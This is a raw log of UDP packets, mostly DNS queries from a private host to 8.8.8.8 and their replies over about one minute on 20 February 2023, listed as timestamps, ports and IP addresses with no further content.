Feb 20, 2023 09:50:54.935436010 CET	59223	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:57.327832937 CET	53	59223	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:57.888490915 CET	59224	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:00.486793995 CET	53	59224	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:00.707521915 CET	59225	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:03.101499081 CET	53	59225	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:03.191668034 CET	59226	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:05.693443060 CET	53	59226	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:06.154134035 CET	59227	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:08.652308941 CET	53	59227	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:08.957344055 CET	59228	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:11.402101040 CET	53	59228	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:11.751753092 CET	56683	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:14.200344086 CET	53	56683	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:14.288825989 CET	56684	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:16.751482010 CET	53	56684	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:17.767703056 CET	56685	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:20.043389082 CET	138	138	192.168.2.5	192.168.2.255
Feb 20, 2023 09:51:21.112845898 CET	53	56685	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:21.339468002 CET	58533	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:23.799144983 CET	53	58533	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:23.851691008 CET	58534	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:26.272521973 CET	53	58534	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:26.457947016 CET	58535	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:26.493554115 CET	53	58535	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:26.497262001 CET	62659	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:26.516710043 CET	53	62659	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:26.746928930 CET	62660	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.029757977 CET	62661	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.067646027 CET	53	62661	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:27.071110010 CET	58581	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.111877918 CET	58582	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.118300915 CET	53	58581	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:27.149293900 CET	53	58582	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:27.175259113 CET	56263	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.194458961 CET	53	56263	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:27.348035097 CET	56264	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.601598024 CET	53	56264	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:27.697011948 CET	56265	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:27.950172901 CET	53	56265	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:28.935072899 CET	56266	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:29.190428972 CET	53	56266	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:29.205327988 CET	53	62660	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:29.264100075 CET	56267	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:29.531255007 CET	53	56267	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:29.582300901 CET	56268	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:29.601907969 CET	53	56268	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:30.125799894 CET	56269	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:30.333642960 CET	56270	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:30.392375946 CET	53	56269	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:30.669555902 CET	65514	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:30.689382076 CET	53	65514	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:30.991125107 CET	65515	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:31.248357058 CET	53	65515	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:31.918257952 CET	65516	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:31.937608004 CET	53	65516	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:32.168422937 CET	65517	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:32.189320087 CET	53	65517	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:32.385993958 CET	65518	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:32.407571077 CET	53	65518	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:32.584939957 CET	65519	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:32.604482889 CET	53	65519	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:32.732045889 CET	65520	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:32.751441956 CET	53	65520	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:32.774257898 CET	53	56270	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.128551006 CET	65521	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.171611071 CET	65522	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.436464071 CET	53	65522	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.525861025 CET	65523	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.542908907 CET	53	65523	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.546865940 CET	56687	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.573378086 CET	53	56687	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.732856035 CET	56688	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.752309084 CET	53	56688	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.878786087 CET	56689	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.895920038 CET	53	56689	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.908495903 CET	64419	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.922935963 CET	64420	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:33.926270962 CET	53	64419	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.940799952 CET	53	64420	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:33.987739086 CET	64421	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.009620905 CET	53	64421	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.019577980 CET	52688	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.039194107 CET	53	52688	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.078430891 CET	52689	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.098304033 CET	53	52689	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.402978897 CET	52690	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.411418915 CET	52691	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.421770096 CET	53	52690	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.424868107 CET	61344	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.430999041 CET	53	52691	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.444528103 CET	53	61344	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.457564116 CET	61345	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.484587908 CET	53	61345	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.518831015 CET	61346	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.547494888 CET	53	61346	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.576858997 CET	61347	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.603847980 CET	53	61347	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.627631903 CET	61348	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.647463083 CET	53	61348	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.680526972 CET	61349	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.686451912 CET	61350	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.706480980 CET	53	61350	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.709781885 CET	53	61349	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.739017010 CET	61351	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.756767988 CET	53	61351	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.757896900 CET	61352	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.825237989 CET	61353	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.842957973 CET	53	61353	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.897200108 CET	61354	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.916695118 CET	53	61354	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.931894064 CET	61355	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.943114996 CET	61356	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:34.958034039 CET	53	61355	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.972461939 CET	53	61356	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:34.998389006 CET	61357	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.023358107 CET	53	61357	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.026410103 CET	53972	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.029033899 CET	53973	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.054850101 CET	53	53972	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.057946920 CET	53	53973	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.106221914 CET	53974	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.112804890 CET	53975	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.125735044 CET	53	53974	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.177499056 CET	53	61352	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.244307041 CET	53	53975	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.563026905 CET	53	65521	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.605746984 CET	64932	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.623167992 CET	64933	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.624593019 CET	53	64932	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.652158022 CET	53	64933	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.652928114 CET	64934	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.660238028 CET	64935	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.672445059 CET	53	64934	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.679088116 CET	53	64935	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.749758005 CET	64936	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.750300884 CET	64937	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.769258976 CET	53	64936	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.769681931 CET	53	64937	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.846771955 CET	64938	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.865915060 CET	53	64938	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.943875074 CET	64939	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.947092056 CET	64940	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.954201937 CET	64941	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:35.971318007 CET	53	64941	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.972934961 CET	53	64939	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.975557089 CET	53	64940	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:35.993092060 CET	64942	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.012271881 CET	53	64942	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:36.154139042 CET	64943	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.162897110 CET	64944	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.163604975 CET	64945	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.173178911 CET	64946	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.181929111 CET	53	64944	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:36.182419062 CET	53	64943	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:36.182943106 CET	53	64945	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:36.190191984 CET	53	64946	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:36.308537960 CET	64947	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:36.326267004 CET	53	64947	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.020447016 CET	64948	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.022198915 CET	64949	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.022623062 CET	64950	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.023051023 CET	64951	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.039299011 CET	53	64949	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.039580107 CET	53	64948	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.039607048 CET	53	64950	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.039958954 CET	53	64951	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.147403955 CET	64952	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.160098076 CET	64953	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.166563988 CET	53	64952	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.179033995 CET	53	64953	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.258969069 CET	64954	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.276160002 CET	53	64954	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.354649067 CET	64955	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.355321884 CET	64956	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:37.373658895 CET	53	64955	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:37.383987904 CET	53	64956	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:38.589526892 CET	64957	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:38.608414888 CET	53	64957	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:38.746731997 CET	64958	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:38.765036106 CET	53	64958	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:38.946341991 CET	64959	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:38.965143919 CET	53	64959	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.056608915 CET	64960	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.063905954 CET	64961	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.065747976 CET	64962	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.068713903 CET	64963	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.075512886 CET	53	64960	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.082739115 CET	53	64962	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.083153963 CET	53	64961	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.087548971 CET	53	64963	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.090055943 CET	64964	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.091124058 CET	64965	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.108021975 CET	53	64965	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.108952999 CET	53	64964	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.153909922 CET	64966	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.170948982 CET	53	64966	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.174488068 CET	64967	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.193698883 CET	53	64967	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.208770990 CET	64968	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.217060089 CET	64969	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.228095055 CET	53	64968	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.229762077 CET	64970	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.235888004 CET	53	64969	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.246822119 CET	53	64970	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.275754929 CET	64971	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.287595987 CET	64972	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.292736053 CET	53	64971	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.293615103 CET	64973	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.304635048 CET	53	64972	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.311017990 CET	53	64973	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.417843103 CET	64974	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.435842037 CET	53	64974	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.529098988 CET	64975	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.532927990 CET	64976	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.533972979 CET	64977	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.534065962 CET	64978	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.534132004 CET	64979	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.534324884 CET	64980	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.551841021 CET	53	64978	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.552417040 CET	53	64976	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.553493023 CET	53	64977	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.553520918 CET	53	64979	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.553788900 CET	53	64980	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.607811928 CET	64981	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.624908924 CET	53	64981	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.712024927 CET	64982	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.719217062 CET	64983	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.724855900 CET	64984	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.728946924 CET	53	64982	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.736088991 CET	53	64983	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.743849993 CET	53	64984	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.745115995 CET	64985	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.749408007 CET	64986	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.766573906 CET	53	64986	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.778254032 CET	53	64985	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.853185892 CET	64987	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.857678890 CET	64988	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.874404907 CET	53	64987	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.874635935 CET	53	64988	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.930032015 CET	64989	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.930123091 CET	64990	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.936883926 CET	64991	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:39.947308064 CET	53	64989	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.947345972 CET	53	64990	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:39.950323105 CET	53	64975	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.022170067 CET	53	64991	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.028063059 CET	58472	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.047897100 CET	53	58472	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.055577993 CET	58473	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.063410997 CET	58474	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.072653055 CET	53	58473	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.080493927 CET	53	58474	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.083795071 CET	58475	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.111471891 CET	53	58475	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.113941908 CET	58476	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.133049011 CET	53	58476	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.245955944 CET	58477	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.250520945 CET	58478	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.264983892 CET	53	58477	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.269588947 CET	53	58478	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.271759987 CET	58479	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.274269104 CET	58480	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.293226004 CET	53	58480	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.303227901 CET	53	58479	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.389282942 CET	58481	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.411125898 CET	53	58481	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.460460901 CET	58482	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.464396000 CET	58483	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.471716881 CET	58484	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.480168104 CET	53	58482	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.481937885 CET	58485	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.483222961 CET	53	58483	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.490803003 CET	53	58484	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.498895884 CET	53	58485	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.625559092 CET	58486	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.643595934 CET	53	58486	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.656017065 CET	58487	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.657809019 CET	58488	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.662374020 CET	58489	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.673418045 CET	53	58487	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.674855947 CET	53	58488	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.710980892 CET	53	58489	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.726382971 CET	58490	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.746378899 CET	53	58490	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.781589031 CET	58491	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.789195061 CET	58492	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.801336050 CET	53	58491	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.817665100 CET	53	58492	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.832207918 CET	58493	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.851058006 CET	53	58493	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.890866995 CET	58494	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.909979105 CET	53	58494	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.919617891 CET	58495	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.932141066 CET	58496	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:40.942943096 CET	53	58495	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:40.951339960 CET	53	58496	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.053720951 CET	58497	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.061522961 CET	58498	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.062508106 CET	58499	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.070905924 CET	53	58497	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.079281092 CET	53	58498	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.098146915 CET	53	58499	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.199296951 CET	58500	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.201304913 CET	58501	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.202008963 CET	58502	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.216981888 CET	53	58500	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.220899105 CET	53	58501	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.221335888 CET	53	58502	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.249291897 CET	58503	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.266485929 CET	53	58503	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.491019011 CET	58504	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.499612093 CET	58505	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.509635925 CET	53	58504	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.521895885 CET	58506	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.522875071 CET	58507	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.526895046 CET	58508	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.540770054 CET	53	58506	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.540903091 CET	53	58507	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.553744078 CET	53	58508	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.554228067 CET	53	58505	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.557027102 CET	60177	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.576072931 CET	53	60177	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.577311993 CET	60178	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.596318007 CET	53	60178	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.655951977 CET	60179	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.665564060 CET	60180	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.669951916 CET	60181	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.673574924 CET	53	60179	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.684565067 CET	53	60180	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.687632084 CET	53	60181	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.746602058 CET	60182	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.765496016 CET	53	60182	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.768476009 CET	60183	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.776098967 CET	60184	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.785475969 CET	53	60183	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.795763969 CET	53	60184	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.826843023 CET	60185	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:51:41.843987942 CET	53	60185	8.8.8.8	192.168.2.5
Feb 20, 2023 09:51:41.882910013 CET	60186	53	192.168.2.5	8.8.8.8
